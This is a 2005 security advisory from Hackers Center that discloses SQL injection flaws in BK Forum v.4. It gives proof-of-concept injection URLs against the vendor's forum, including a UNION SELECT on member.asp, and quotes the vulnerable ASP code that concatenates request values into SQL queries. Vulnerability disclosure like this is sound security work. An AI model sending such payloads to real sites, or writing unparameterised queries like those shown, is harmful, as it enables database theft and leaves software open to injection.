No account yet?
Home » HSC Research » Advisories » [HSC] Multiple Sql injection vulnerabilities in BK Forum
[HSC] Multiple Sql injection vulnerabilities in BK Forum E-mail
HSC Research Group - Advisories
Written by Hackers Center   
Saturday, 23 April 2005 09:42
Dcrab "s Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab"s Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah

Severity: High
Title: Multiple Sql injection vulnerabilities in BK Forum v.4
Date: 23/04/2005

Vendor: BKdev
Vendor Website: http://www.bkdev.net
Summary: There are, multiple sql injection vulnerabilities in bk forum v.4.


Proof of Concept Exploits:

http://forum.bkdev.net/member.asp?id=10%20UNION%20Select%20*%20from%20Member%20where%20memName%20=%20"dc"
[CODE]
id = request.querystring("id")
sql = "select * from Member where memID = " & id
set rs = conn.execute(sql)
[/CODE]
http://forum.bkdev.net/forum.asp?forum="SQL INJECTION
[CODE]
id = request.querystring("id")
sql = "select * from Member where memID = " & id
set rs = conn.execute(sql)
[/CODE]
http://forum.bkdev.net/register.asp

All the form values are vulnerable to sql injection
[CODE]
sql = "insert into Member (memName, memPassword, memFirstName, memLastName, memEmail, memHomepage, " & _
"memDate, memLevel, memSignature, memPic, memAbout, memAcceptNotification, memShowAvatar, memLoggedOn, " & _
"memLastActive) values ("" & memname & "", "" & mempw & "", "" & firstname & "", "" & lastname & "", " & _
""" & email & "", "" & homepage & "", #" & now & "#, " & LEVEL_MEMBER & ", "" & signature & "", " & _
""" & picture & "", "" & about & "", " & notify & ", " & avatar & ", " & false & ", #" & now & "#)"
[/CODE]


Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author:
These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding with php.
 

Security Services by HSC

Contact us

Become partner
Advertise with us
Join our staff